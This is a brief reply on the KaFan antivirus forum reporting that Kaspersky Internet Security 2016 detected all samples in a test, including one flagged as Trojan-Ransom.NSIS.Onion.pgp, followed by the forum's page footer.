KIS2016 MR1 kill all
#1 UDS杀
#2 入库杀 Trojan-Ransom.NSIS.Onion.pgp
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-15 02:42 , Processed in 0.155076 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表